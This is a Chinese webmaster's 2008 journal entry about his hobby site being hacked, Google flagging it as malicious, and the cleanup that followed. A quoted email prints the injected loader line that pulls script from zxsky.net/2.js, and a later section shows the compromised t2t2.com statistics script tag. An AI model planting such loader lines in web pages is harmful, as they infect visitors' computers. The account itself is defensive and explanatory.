主页
--> master-015 |
|
|
master-015
站长手记-15 (2008.1.6.-- 2.3)
|
遭遇黑客
|
Be
hit by the hackers
|
|
这已经是第2次了.第1次发生在2005年.不过那一次影响很小,而这次却大不一样! |
2007.12.23.在打开网站主页时,跳出来病毒提示.当时我并没太在意,因为过去也有偶尔的现象,都是误判.没想到这次是真的来了.网页接连被提示有毒,(见图1).而且有的网友打电话,发邮件,告诉我网站出现病毒(图2),我不得不认真的对待了 |
|
首先检查网页,在Dreamwerver(以下简称DW)编辑器中打开主页,在后台仔细观察代码,一个主页代码就有几千行,看起来还真是累人.换一种办法试试吧,先把正常的页面删除,留下一小部分代码上传试验,几次反复,还算顺利,很快就锁定了那个坏蛋,原来它就躲在最后一行(见图3).这是一个带毒网站的地址.你只要把那个http的地址写到到IE浏览器,一打开就会有病毒提示了(如您要试验一定先保持您的杀毒软件是正常的) |
|
倒底有多少网页中了毒我还不得而知,只好把网页下载回来全面杀毒.起初我不敢肯定杀毒软件能找到这些代码,(后来经试验证明瑞星是可以对付这类代码的)所以只好用DM的查找与替换功能,这个功能很好,很快就找出并删除了70多个网页的病毒代码.在重新上传了这些网页之后网站又恢复了平静,我还很高兴,以为问题已经解决了! |
|
|
|
事实证明我完全低估了黑客的贪婪和它的严重危害.第二天,在打开网页时又出现了病毒的提示.我以为还是那个代码在作怪,我重新下载并在DW中打开主页代码检查,见不到那个代码.这使得我很头疼,这个毒源在哪里呢?想来想去,我想起了2005年那一次中毒,这一次会不会又故技重演呢?我赶忙打开那个小小的脚本文件,这个文件只有几行代码,用眼一看,真地又发现了那一段新添上的病毒代码(见图4,上面7行是原有的,双虚线上面的第8行是被黑客写入的) |
|
|
这是一个后缀为.js的脚本文件,它是为主页上一个自带的播放器而设置的,主页上所有的在线播放乐曲,都是在它的指挥下进行的.这个播放器既小巧又美观,我一直很喜爱它,所以2005年中毒以后我也没舍得动它.没想到,这次又成了黑客的盘中美食.思量再三,这次还是暂时把它取消吧,主页改用普通客户端常用的WMP播放器.好在经过两三年的时间,这种播放器已经很普及了,应该不会对访问者带来麻烦.音乐文件都还保留着,今后如果有了好的防范对策可以很快地恢复. |
这次检查虽然顺利,但我的思想变的沉重起来.黑客会不会就此罢休.就我的这一点电脑水平而言,我能是黑客的对手吗?更严重的是它的影响已经出现了,到第三天,我发现网站的访问量持续的急剧下降.原来每天一般都在800-1400之间,而这两天突然锐减到500以下,最低时只有380(见图5) |
|
我一下子还没弄明白为什么下降这么多?我怀疑是不是服务器那边出了什么毛病?我打电话给ISP,将这个问题告诉了他们并询问他们那里的情况.他们告诉我那边情况正常,还没有发现其它网站被黑的情况,可能是我的网站存在漏洞造成的.另外,根据他门的经验,一旦网页上出现病毒,很容易被搜索引擎标上印记,提醒访问者小心,这样很容易造成访问量的急剧降低.他门要我到搜索引擎上看看. |
真是不看不知道,一看吓一跳.我们的网站已被GOOGLE标注为有毒的网站-"该网站可能含有恶意软件,有可能危害您的电脑"(见图6) |
|
再打开国外各种不同语言的GOOGLE,英国,法国,美国,加拿大,俄罗斯,日本,香港,巴西....无一例外地都被打上了这恼人的印记(见图7) |
图7
|
|
|
上: 英国 UK
|
上: 俄罗斯 Russia
|
|
|
上: 美国/加拿大 USA/Canada
|
上:日本 Japan
|
|
|
上: 巴西 Brasil
|
上: 沙特 Saudi Arabia
|
|
哦,到此我才恍然大悟,原来这罪魁祸首全是这个害人的黑客.我们这个小小的网站,在全世界几千万个网站当中,只不过是大海中的一滴水,茫茫草原中的一棵小草.经过五年的努力,ALEX排名也仅在30万左右.其性质仅是一个个人网站而已.虽不敢自詡为无私奉献,但至少也算是公益之举.这黑客没有本领去碰那些为富不仁,欺世盗名的霸主,却拿我们这样的弱者来连连开刀,说句白话,实在是太"缺德"了. |
人被逼到墙角总是要反抗的.我首先找到了中国互联网违法和不良信息举报中心(http://net.china.cn/index.htm)举报这些不义之徒,请求他们查清源头,维护公德.接下来,我得考虑首先还是要立足自身,扎紧篱笆,防范野狗.我找了ISP的技术人员和我们的技术顾问WESTP,他们都给出了很好的建议.下面是WESTP朋友的一个邮件 |
播放器的代码文件我看了,其实很简单,与上次的情况一样,病毒在这个脚本文件的最后一行加入了一行代码,意思是去下载一段Javascript脚本,正是那个脚本含毒。
所以,只需要把最后一行删除即可。代码如下:
________________________________________________________
function play(MediaFile)
{
var
MediaFilePath='../ListenOnLine/';
player.URL=MediaFilePath+MediaFile;
player.controls.play();
}
document.writeln("<script src=http:\/\/zxsky.net\/2.js><\/script>");
这一行有问题!删除即可。
________________________________________________________
关于彻底解决此类问题,主要依赖于3点:
1 我们自己的机器:如果我们自己的机器有毒,上传的网页文件含毒也就不奇怪了。
2 服务器上的安全防护程序:服务器上不能的病毒驻留,否则我们上传的网页即使是干净的,一传上去就会被感染。
3 服务器的运行的论坛、博客等系统的安全性。这也就是我上次建议我们手工在数据库中修改附加文件的路径,之后手工重新发布,而不大规模修改博客系统代码的原因。一个系统的安全性依赖于很长时间的积累与完善,非一朝一夕能成。
就目前来说,实现第1、2点,已经能防住绝大多数病毒了,并且对第3点问题的解决,也是很有帮助的。
|
|
从各方面的意见来看,要想防范黑客,最重要的是要堵死网站可能存在的漏洞,含有脚本和ASP代码网页的写入功能是最容易产生漏洞的部位,也是黑客侵入的首选渠道.这个网站的唯一脚本网页一开始就取消了,剩下来就是ASP网页的问题.几年来,为了网友的方便,这个网站增加了不少的ASP互动功能,如各种留言本,包括要求下载的留言,确实受到国内外朋友的喜爱,一年多来,已为近200位朋友提供了约500项作品的下载.还有ASP上传,作品评论等等.取消这些功能的确让人心痛.我思考再三,保留固然很好,但就我们这个小小网站的技术水平和我个人这把年纪的防范精力而言,是很难和那些随时磨刀霍霍的年轻黑客相抗衡的.相对网站的长期安全运行而言,就是从广大访问者的利益出发,也还是舍小保大,丢卒保车为好.何况现在电子邮件也很方便.为了安全便利,最近又在网站空间内开辟了一个站长邮箱
qilingren@163.com
经试用效果也很好,虽然比起在线互动略有不便,但也不会带来太多的困难.最后,决心已定.把所有这些ASP功能一律取消,希望能堵死漏洞的源头,确保网站的平安.为此并在各相关部位发布了以下通告: |
本站重要通告
|
本站互动功能开办年多来,深受网友的喜爱,已先后为国内外二百多位朋友提供了500多项下载及其它服务,但自2008年伊始,本站即遭受到不明黑客的连续攻击(详见此页),任意在网页中写入恶意病毒代码.虽经多次删除并修改部分脚本及写入功能,但仍未彻底解决,从而导至世界各大搜索引擎以各种语言宣示本站网页有毒,造成访问者怯而远之,访问量急剧降低.本站虽已向中国互联网违法和不良信息举报中心作了举报,但一时仍难奏效.鉴于本站系个人公益性网站.没有充足的精力和技术应付这一类日益猖獗的严重干扰,为了保证网站的长期稳定安全运行和访问者的长远利益,自即日起本站不得不关闭所有的包括留言本,评论,要求下载留言,英文论坛以及ASP上传等所有写入功能,并作如下通知 |
1.所有网友如有任何要求或留言,请通过电子邮件发送给本站.如有留言类的内容请于注明,本站将专门设置一个网友留言网页由本站如实编辑上传 |
2.如有需要上传文件,一般4M以下均请使用电子邮件.
大于4M的文件可以分割后,发送或用电子邮件告知本站,我们们将为您另外提供一个专用通道上传 |
3.对于要求下载的朋友,也请使用电子邮件.为了网友之间的的友好交流,请您在来件的同时附上一张您的所在的城镇风景照片(请注明您的城镇地名)或是一张您的个人照片,本站将连同您的电邮地址和照片一起在专页上发表并于回复.如您的电邮地址要求保密请在邮件中注明,本站将只发布照片和您的电邮@前面的户名(不含地址),谢谢您的合作 |
|
|
|
A
urgent notice
|
The web site has sufferted hackers'
continuous attack for many times from 2008 beginning(See
the page). It has leded sharp reduce of visiting quantity.
Because this is a personal site, so difficult lastly and effectively
to resolve these problem, for the sake of safety of the web
site and webfriends' benefit, we have to close all write function
of the guestbook, comment, English forum, A message for request
download and ASP upload etc. from today, and announce below |
1. Please use the
E-mail for all request and message |
2. If you need to upload less
4M file, please use the
E-mail. For more 4M file, you can split it for upload.
Or please inform to us using the
E-mail, we will provide a special channel for your upload |
3. For request download music
and movies, please use the
E-mail. For the sake of friendship exchange between web
friends, please enclosed a photo of city or town you live
in (please note its name) , or your personal photo. we will
publish it in a
special page with our reply. If your E-mail address need
to be secrecy, please tell us, we will only publish the head
part before @ (without address). Thanks for your cooperation! |
|
|
|
|
|
|
|
实践证明,下这个决心还是对的.就在我清理ASP程序的过程中,下载了那个ASP上传功能的两个网页,经过杀毒,果然又在这两个ASP文件中发现了传上来的病毒(见图8).这个漏洞如果不消除,这个"肉鸡"黑客肯定还会继续来吃的.至于网站还有哪些漏洞,真是一下子很难弄明白,只好静观其发展了..... |
|
这几天下来,确实把人搞的心神不定,坐卧不安.更严重的是,三个域名中已有两个发出了警告,如果这个问题解决不了,整个网站都有全军覆没的可能.一段时期以来,为了方便网友的互动,增进大家的交流和友谊,本站先后开辟了论坛(俱乐部),博客群等功能,为网友提供一些条件,但由于所用的软件均取自网上,可能存在不少漏洞,确实带来了受攻击的可能性.(事实上论坛和博客均已先后遭受过严重的搔扰,包括未经批准自行在博客群中登录开辟帐户,发布广告等等问题)这互联网技术日新月异,高深莫测,就连大名鼎鼎的微软也天天忙着堵漏洞,打补丁,我们这小小的网站就更难说了.我已向瑞星等知名杀毒门户求援,但他们对这类网站的救援能力似乎也有所限度,表示只能提供咨询,但不能保证.怎么办?想来想去,还是国际歌上的那句老话,最后全靠自己救自己.互联网目前是这样的的混乱,(从中国互联网违法和不良信息举报中心公布的数字来看,目前每个月举报的数字大约在2万件,比2006年差不多翻了一倍,平均每天就有700件之多,我不知道这个中心有多少工作人员,他们能消化掉这铺天盖地一样的违法和犯罪行为吗?我们只有拭目以待了!)我们还不得不下最大的决心,考虑中止包括论坛,博客在内的所具有写入功能的程序的运行.这当然是一个痛苦的决定,特别是许多网友花费了大量心血,精力,发表了那么多的优秀作品,这样作的影响是可想而知的.但为了网站的生存发展,也许不得不忍受这断腕之痛了.为了尽可能保存多年来上百位网友在论坛,博客所发表的精彩文章,我们准备今后将其中重要的文章重新整理出来,在网站中开辟一个博客,论坛网友的个人专栏,逐步利用WEB网页保存和发布这些文章.同时,本站已在博客和论坛发布了紧急公告,还向各位有关朋友发去了电子邮件,准备在几天后彻底关闭这些程序.请朋友们作一点思想准备,抓紧时间自行保存重要的文件,共同努力来度过这个难关. |
|
|
|
关于黑客
|
有了这几天的焦灼经历,我自然对黑客也更加关注,我在百度百科上查找了一下"黑客",这是很长的一篇文章,以下仅摘录其黑客的定义部分 |
|
在力求当一个黑客前,我们要先了解什么是黑客
Hacker -- 黑客
热衷研究、撰写程序的专才,且必须具备乐于追根究底、穷究问题的特质。
在黑客圈中,hacker一词无疑是带有正面的意义,例如system hacker熟悉操作系统的设计与维护;password
hacker精于找出使用者的密码,若是computer hacker则是通晓计算机,可让计算机乖乖听话的高手。
黑客基本上是一项业余嗜好,通常是出于自己的兴趣,而非为了赚钱或工作需要。
根据开放原始码计划创始人Eric Raymond对此字的解释,hacker与cracker是分属两个不同世界的族群,基本差异在于,hacker是有建设性的,而cracker则专门搞破坏。
hacker原意是指用斧头砍材的工人,最早被引进计算机圈则可追溯自1960年代。
加州柏克莱大学计算机教授Brian Harvey在考证此字时曾写到,当时在麻省理工学院中(MIT)的学生通常分成两派,一是tool,意指乖乖牌学生,成绩都拿甲等;另一则是所谓的hacker,也就是常逃课,上课爱睡觉,但晚上却又精力充沛喜欢搞课外活动的学生。
这跟计算机有什么关系?一开始并没有。不过当时hacker也有区分等级,就如同tool用成绩比高下一样。真正一流hacker并非整天不学无术,而是会热衷追求某种特殊嗜好,比如研究电话、铁道(模型或者真的)、科幻小说,无线电,或者是计算机。也因此后来才有所谓的computer
hacker出现,意指计算机高手。
对一个黑客来说,学会入侵和破解是必要的,但最主要的还是编程,毕竟,使用工具是体现别人的思路,而程序是自己的想法.一句话--编程实现一切!
对于一个骇客来说,他们只追求入侵的快感,不在乎技术,他们不会编程,不知道入侵的具体细节.
"黑客"在人们脑中的形象就是一个蓬头乱发,戴着高度眼镜,驼着背弓着腰,成天趴在电脑面前的人.其实黑客和正常人一模一样,他们并无什么特殊之处.有些人也许很少上电脑,成天运动,工作,但他们的技术和精神已经达到的黑客的标准,有些人天天爬在电脑前,到处瞎混,但他们仍不是黑客.
人们总是认为黑客就是破坏者,其实从某种意义上来说,黑客也在为计算机技术的发展做出很大的贡献.如果没有高明的黑客,就没有资深的网管;如果没有完美的木马,就没有杰出的杀毒软件;没有了黑客,网络技术就很难发展下去.当然,网管其实也是黑客,如果他不知道别人怎么进攻,自己要怎么防守呢??
黑客一词在圈外或媒体上通常被定义为:专门入侵他人系统进行不法行为的计算机高手。不过这类人士在hacker眼中是属于层次较低的cracker(骇客)。如果黑客是炸弹制造专家,那么CRACKER就是恐怖分子.
现在,网络上出现了越来越多的Cracker,他们只会入侵,使用扫描器到处乱扫,用IP炸弹炸人家,毫无目的地入侵,破坏着,他们并无益于电脑技术的发展,反而有害于网络的安全和造成网络瘫痪,给人们带来巨大的经济和精神损失.
我们不能做Cracker,我们要力求当HACKER!!
|
|
从百度的文章中,我们已可以对黑客有一个大概的了解.下面我想结合这几天的遭遇对黑客们写上几句: |
|
黑客黑客 有侠有恶
|
侠者艺高 助人为乐
|
不扰平民 天高地阔
|
劫富济贫 拔刀除恶
|
我劝学子 有志为国
|
展翅虚拟 先立道德
|
|
|
|
欢迎更多的朋友们为本站献计献策,保障网站的安全,以便能更好地为大家服务.对于目前及可能采取的措施,也请大家给于谅解与合作. |
|
2008.1.6.
|
|
|
一波未平,一波又起
|
中国老话"祸不单行,福不双至",这句话常常被说中.我相信它并不是迷信,我想这大概是古人应用概率理论的一个范例.这不,才过了几天平安日子,警告又来了,不过这次首先是来源于中国电信(江苏)的一个网上查毒业务.2008.1.11.当我打开网站时,下面一个警告网页又突然跳了出来 |
|
网站刚刚处理好,怎么又冒出病毒来,莫非这病毒也学习了非典的招术,还有潜伏期?好在江苏电信的10000号服务电话很好用,我拿起电话找到了他们,转了几个弯,终于找到了管这个业务的技术人员,他在检查了网页之后告诉我,可能是由于网页中调用了某个插件带来的反应.我希望他门能告诉我是哪个插件,他说这已不在他们的业务范围之内了. |
接下来我又一次被推向思索之谷.当一个人被逼着去作一件他所不熟悉甚至不了解的工作而又感到茫然无助的时侯,他的心情往往是很沮丧的.特别是在我这样的年纪更会出现这种感受.这样搞网站实在是太吃力了.不过既然上了网络这条船,那也只有拼到底了.我再次打开网页,删去正常的内容,仔细地一行一行地查看,没发现甚么特殊的迹象,我又陷入了沉思,回想10000号的回答,插件,调用?....谁在调用,我忽然想起为了对网站发展进行更多的研究而加入的多个免费统计代码,每次打开网页时,它们是会自动连向那几个免费的统计程序的.不过我选用的都是些有名的大站,最早的太极链,以后又陆续加入的ITSUN,51LA,还有一个国外的知名网站Extreme,难道它们会有问题?"实践是检验真理的标准",这句从毛泽东时代学来而又在其后第二代到第四代领导人一再强调的话,也是我一生行事寻源的一个百试百灵的法宝.我将这几个代码中所调用的URL
一个一个地粘贴到IE浏览器中回车查看,真有点出乎意料,在打开太极链的URL http://vip6.t2t2.com/visit.js
同时,那个警告就又跳了出来 |
这就是那段导至报毒的代码
|
<script language=javascript
src="http://vip6.t2t2.com/visit.js"></script>
|
|
这段 java script 语句的含意并不复杂,它的意思就是当其所在网页被打开时,这个
http://vip6.t2t2.com/visit.js 网址和相应的程序将被自动执行.哦,毒源终于找出来了! |
为了验验证这个发现的可靠性,我又在GOOGLE中输入了t2t2四个字,在搜索结果中的确出现了不少和我的网站一样的被GOOGLE标为有毒的网站 |
|
其中特别是"天下收藏"和"游戏下载站网址",都是直接使用t2t2.com的二级域名,这更使人确信无疑了.
|
当然,这并是说t2t2就是制毒者,也许它也是受害者,但无论如何我必需把这个情况立即通知这个网站.我找到太极链的主页
http://www.textclick.com/
,查看它的联系方法,上面有电话和QQ号码,我拨打电话,无人接听,再上QQ,也是无人应答.膸想起来了,这是星期六,大概无人值班,我只好等到周一再说了. |
接下来,我必许采取果断措施,删除这一段代码.不过这可不是一件容易的事,这代码分散在全站几千个网页之中,而且很多网页,特别是那些RM格式的导向网页,是和很多RM大文件放在一起的,为了万无一失,需要把每个文件夹打开把它们完全下载回来,检查清除之后再重新上传.1月14日下午,我把这个情况通报给ISP的经理,他听后告诉我,不只太极链有问题,而且另一家有名的统计站点ITSUN前不久也被黑了.恰恰,我的网页也在使用这个统计,不过这些天我已发现这个网站关闭了,不知是何原因.现在才知道,原来它也成了黑客的受害者.没有别的选择,我只好再重新把所有ITSUN的代码完全删除.为了这件事前前后后总计花了五天时间,的确让人感到心力交瘁了. |
1月14日,星期一上午我终于通过QQ和太极链的客服取得了联系,以下是我们的交谈记录 |
|
尽管这几天非常疲劳,但为了全国众多和我一样受其影响的网站站长的利益和需要,我还是想把它写出来以和大家共享.当然我也更希望太极链能尽快查明原因,采取措施,并应向全国的广大用户作出解释. |
|
|
好了,这个网页也够长了.我也需要有一段适当的休息.不过"困难和挫折教训了我们",除去本站自行采取的必要措施之外,我想有几点教训是每位站长(特别是非专业人员所主持的网站)所应当吸取的: |
1.尽量少用具有互动和写入功能的类似ASP.PHP等类型的程序.例如聊天室,留言本,评论,论坛,在线上传,博客等等.如果要用,您必须要具备防黑客入侵的能力.如果没有或者缺乏这种能力,建议您取消这种程序,就象本站这次下决心所作的一样,改以E-mail等传统的间接方式保留互动渠道 |
2.尽可能地少用外部链接.包括外部免费的统计功能.特别对于现在很流行的免费小插件,甚么天气预报,IP显示,流量联盟之类的代码,决不要任意放入您的网页.要用也一定要选那些知名大站提供的程序以减少被其毒害的几率.例如,最近本站新加入的Google分析工具代码,实际上是一个很高级的统计功能.一般来说,应当可以放心的使用(当然,也不可能绝对排除它受攻击的可能) |
3.选择信誉度高,功能齐备的ISP服务商.新型的虚拟主机都已加入了许多防黑客的功能,如关闭FSO功能,关闭ASP/PHP功能,关闭写入功能等等.有选择的使用这些功能对于保障网站的安全是很有好处的 |
|
2008.1.16 追补
|
|
|